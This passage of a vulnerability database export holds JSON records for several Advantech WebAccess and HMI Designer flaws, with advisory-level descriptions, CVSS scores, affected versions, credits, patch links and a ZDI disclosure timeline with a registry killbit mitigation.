"ZDI-20-626" }, { "db": "ZDI", "id": "ZDI-20-627" }, { "db": "CNVD", "id": "CNVD-2020-29742" }, { "db": "VULHUB", "id": "VHN-164663" }, { "db": "VULMON", "id": "CVE-2020-12026" }, { "db": "JVNDB", "id": "JVNDB-2020-005147" }, { "db": "CNNVD", "id": "CNNVD-202005-303" }, { "db": "NVD", "id": "CVE-2020-12026" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "f4254815-d8f8-4350-9a94-696eea61a062" }, { "db": "IVD", "id": "7b562860-41d1-412d-8d4e-7ed58e4b7f7d" }, { "db": "ZDI", "id": "ZDI-20-626" }, { "db": "ZDI", "id": "ZDI-20-627" }, { "db": "CNVD", "id": "CNVD-2020-29742" }, { "db": "VULHUB", "id": "VHN-164663" }, { "db": "VULMON", "id": "CVE-2020-12026" }, { "db": "JVNDB", "id": "JVNDB-2020-005147" }, { "db": "CNNVD", "id": "CNNVD-202005-303" }, { "db": "NVD", "id": "CVE-2020-12026" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "f4254815-d8f8-4350-9a94-696eea61a062" }, { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "7b562860-41d1-412d-8d4e-7ed58e4b7f7d" }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-626" }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-627" }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29742" }, { "date": "2020-05-08T00:00:00", "db": "VULHUB", "id": "VHN-164663" }, { "date": "2020-05-08T00:00:00", "db": "VULMON", "id": "CVE-2020-12026" }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005147" }, { "date": "2020-05-07T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-303" }, { "date": "2020-05-08T12:15:11.443000", "db": "NVD", "id": "CVE-2020-12026" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-626" }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-627" }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29742" }, { "date": "2021-09-23T00:00:00", "db": "VULHUB", "id": "VHN-164663" }, { "date": "2020-05-11T00:00:00", "db": "VULMON", "id": "CVE-2020-12026" }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005147" }, { "date": "2021-01-04T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-303" }, { "date": "2024-11-21T04:59:08.347000", "db": "NVD", "id": "CVE-2020-12026" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202005-303" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Node Past Traversal Vulnerability in", "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005147" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "f4254815-d8f8-4350-9a94-696eea61a062" }, { "db": "IVD", "id": "7b562860-41d1-412d-8d4e-7ed58e4b7f7d" }, { "db": "CNNVD", "id": "CNNVD-202005-303" } ], "trust": 1.0 } }
var-201908-1828
Vulnerability from variot
In Advantech WebAccess HMI Designer Version 2.1.9.23 and prior, processing specially crafted MCR files lacking proper validation of user supplied data may cause the system to write outside the intended buffer area, allowing remote code execution. Advantech WebAccess HMI Designer Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess HMI Designer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of MCR files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Advantech WebAccess HMI Designer is a human machine interface (HMI) runtime development software. The product has functions such as data transmission, menu editing and text editing. There is a buffer error vulnerability in Advantech WebAccess HMI Designer 2.1.9.23 and earlier versions, the vulnerability is due to the fact that the program does not correctly verify the data submitted by the user
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1828", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess hmi designer", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.1.7.32" }, { "model": "webaccess/hmi", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "2.1.9.23" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess hmi designer", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.1.9.23" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess hmi designer", "version": "*" } ], "sources": [ { "db": "IVD", "id": "bb9f1deb-4880-41e7-bc75-e3d5e343b809" }, { "db": "ZDI", "id": "ZDI-19-691" }, { "db": "CNVD", "id": "CNVD-2019-32465" }, { "db": "JVNDB", "id": "JVNDB-2019-007454" }, { "db": "NVD", "id": "CVE-2019-10961" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess_hmi_designer", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-007454" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-691" }, { "db": "CNNVD", "id": "CNNVD-201908-167" } ], "trust": 1.3 }, "cve": "CVE-2019-10961", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2019-10961", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CNVD-2019-32465", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "bb9f1deb-4880-41e7-bc75-e3d5e343b809", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-142560", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2019-10961", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-10961", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "Required", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2019-10961", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "REQUIRED", "vectorString": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-10961", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2019-10961", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2019-10961", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2019-32465", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201908-167", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "bb9f1deb-4880-41e7-bc75-e3d5e343b809", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-142560", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "bb9f1deb-4880-41e7-bc75-e3d5e343b809" }, { "db": "ZDI", "id": "ZDI-19-691" }, { "db": "CNVD", "id": "CNVD-2019-32465" }, { "db": "VULHUB", "id": "VHN-142560" }, { "db": "JVNDB", "id": "JVNDB-2019-007454" }, { "db": "CNNVD", "id": "CNNVD-201908-167" }, { "db": "NVD", "id": "CVE-2019-10961" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "In Advantech WebAccess HMI Designer Version 2.1.9.23 and prior, processing specially crafted MCR files lacking proper validation of user supplied data may cause the system to write outside the intended buffer area, allowing remote code execution. Advantech WebAccess HMI Designer Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess HMI Designer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of MCR files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Advantech WebAccess HMI Designer is a human machine interface (HMI) runtime development software. The product has functions such as data transmission, menu editing and text editing. There is a buffer error vulnerability in Advantech WebAccess HMI Designer 2.1.9.23 and earlier versions, the vulnerability is due to the fact that the program does not correctly verify the data submitted by the user", "sources": [ { "db": "NVD", "id": "CVE-2019-10961" }, { "db": "JVNDB", "id": "JVNDB-2019-007454" }, { "db": "ZDI", "id": "ZDI-19-691" }, { "db": "CNVD", "id": "CNVD-2019-32465" }, { "db": "IVD", "id": "bb9f1deb-4880-41e7-bc75-e3d5e343b809" }, { "db": "VULHUB", "id": "VHN-142560" } ], "trust": 3.06 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-10961", "trust": 4.0 }, { "db": "ICS CERT", "id": "ICSA-19-213-01", "trust": 3.1 }, { "db": "ZDI", "id": "ZDI-19-691", "trust": 2.4 }, { "db": "CNNVD", "id": "CNNVD-201908-167", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32465", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-007454", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7805", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.2903", "trust": 0.6 }, { "db": "IVD", "id": "BB9F1DEB-4880-41E7-BC75-E3D5E343B809", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-142560", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "bb9f1deb-4880-41e7-bc75-e3d5e343b809" }, { "db": "ZDI", "id": "ZDI-19-691" }, { "db": "CNVD", "id": "CNVD-2019-32465" }, { "db": "VULHUB", "id": "VHN-142560" }, { "db": "JVNDB", "id": "JVNDB-2019-007454" }, { "db": "CNNVD", "id": "CNNVD-201908-167" }, { "db": "NVD", "id": "CVE-2019-10961" } ] }, "id": "VAR-201908-1828", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "bb9f1deb-4880-41e7-bc75-e3d5e343b809" }, { "db": "CNVD", "id": "CNVD-2019-32465" }, { "db": "VULHUB", "id": "VHN-142560" } ], "trust": 1.36063109 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "bb9f1deb-4880-41e7-bc75-e3d5e343b809" }, { "db": "CNVD", "id": "CNVD-2019-32465" } ] }, "last_update_date": "2024-11-23T22:51:40.447000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess/HMI", "trust": 0.8, "url": "https://www.advantech.com/industrial-automation/webaccess/webaccesshmi" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-213-01" }, { "title": "Advantech WebAccess HMI Designer out of boundary write vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181495" }, { "title": "Advantech WebAccess HMI Designer Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95926" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-691" }, { "db": "CNVD", "id": "CNVD-2019-32465" }, { "db": "JVNDB", "id": "JVNDB-2019-007454" }, { "db": "CNNVD", "id": "CNNVD-201908-167" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-142560" }, { "db": "JVNDB", "id": "JVNDB-2019-007454" }, { "db": "NVD", "id": "CVE-2019-10961" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.8, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-213-01" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-691/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10961" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10961" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2903/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-691" }, { "db": "CNVD", "id": "CNVD-2019-32465" }, { "db": "VULHUB", "id": "VHN-142560" }, { "db": "JVNDB", "id": "JVNDB-2019-007454" }, { "db": "CNNVD", "id": "CNNVD-201908-167" }, { "db": "NVD", "id": "CVE-2019-10961" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "bb9f1deb-4880-41e7-bc75-e3d5e343b809" }, { "db": "ZDI", "id": "ZDI-19-691" }, { "db": "CNVD", "id": "CNVD-2019-32465" }, { "db": "VULHUB", "id": "VHN-142560" }, { "db": "JVNDB", "id": "JVNDB-2019-007454" }, { "db": "CNNVD", "id": "CNNVD-201908-167" }, { "db": "NVD", "id": "CVE-2019-10961" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "bb9f1deb-4880-41e7-bc75-e3d5e343b809" }, { "date": "2019-08-05T00:00:00", "db": "ZDI", "id": "ZDI-19-691" }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32465" }, { "date": "2019-08-02T00:00:00", "db": "VULHUB", "id": "VHN-142560" }, { "date": "2019-08-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-007454" }, { "date": "2019-08-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201908-167" }, { "date": "2019-08-02T17:15:14.327000", "db": "NVD", "id": "CVE-2019-10961" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-08-05T00:00:00", "db": "ZDI", "id": "ZDI-19-691" }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32465" }, { "date": "2023-03-03T00:00:00", "db": "VULHUB", "id": "VHN-142560" }, { "date": "2019-08-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-007454" }, { "date": "2019-08-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201908-167" }, { "date": "2024-11-21T04:20:15.013000", "db": "NVD", "id": "CVE-2019-10961" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201908-167" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess HMI Designer Vulnerable to out-of-bounds writing", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-007454" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "bb9f1deb-4880-41e7-bc75-e3d5e343b809" }, { "db": "CNNVD", "id": "CNNVD-201908-167" } ], "trust": 0.8 } }
var-201708-1714
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of user-supplied data which can result in a memory access outside an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-531" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-531" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-531", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-531", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-531" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of user-supplied data which can result in a memory access outside an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-531" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4078", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-531", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-531" } ] }, "id": "VAR-201708-1714", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:05:50.383000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\73888E2B-FF04-416c-8847-984D7FC4507FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-531" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-531" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-531", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-531", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-531", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess RtspVapgDecoderNew2 SetLangString Out-of-bounds Access Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-531" } ], "trust": 0.7 } }
var-201801-0152
Vulnerability from variot
An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27eb IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 10.5, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.6, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2e1079e-39ab-11e9-9b2b-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-035" }, { "db": "ZDI", "id": "ZDI-18-012" }, { "db": "ZDI", "id": "ZDI-18-020" }, { "db": "ZDI", "id": "ZDI-18-038" }, { "db": "ZDI", "id": "ZDI-18-039" }, { "db": "ZDI", "id": "ZDI-18-040" }, { "db": "ZDI", "id": "ZDI-18-031" }, { "db": "ZDI", "id": "ZDI-18-013" }, { "db": "ZDI", "id": "ZDI-18-010" }, { "db": "ZDI", "id": "ZDI-18-022" }, { "db": "ZDI", "id": "ZDI-18-014" }, { "db": "ZDI", "id": "ZDI-18-029" }, { "db": "ZDI", "id": "ZDI-18-009" }, { "db": "ZDI", "id": "ZDI-18-037" }, { "db": "ZDI", "id": "ZDI-18-032" }, { "db": "CNVD", "id": "CNVD-2018-00673" }, { "db": "CNNVD", "id": "CNNVD-201801-241" }, { "db": "NVD", "id": "CVE-2017-16728" } ] }, "credits": { "_id": null, "data": "Steven Seeley (mr_me) of Offensive Security", "sources": [ { "db": "ZDI", "id": "ZDI-18-035" }, { "db": "ZDI", "id": "ZDI-18-012" }, { "db": "ZDI", "id": "ZDI-18-020" }, { "db": "ZDI", "id": "ZDI-18-038" }, { "db": "ZDI", "id": "ZDI-18-039" }, { "db": "ZDI", "id": "ZDI-18-040" }, { "db": "ZDI", "id": "ZDI-18-031" }, { "db": "ZDI", "id": "ZDI-18-013" }, { "db": "ZDI", "id": "ZDI-18-010" }, { "db": "ZDI", "id": "ZDI-18-022" }, { "db": 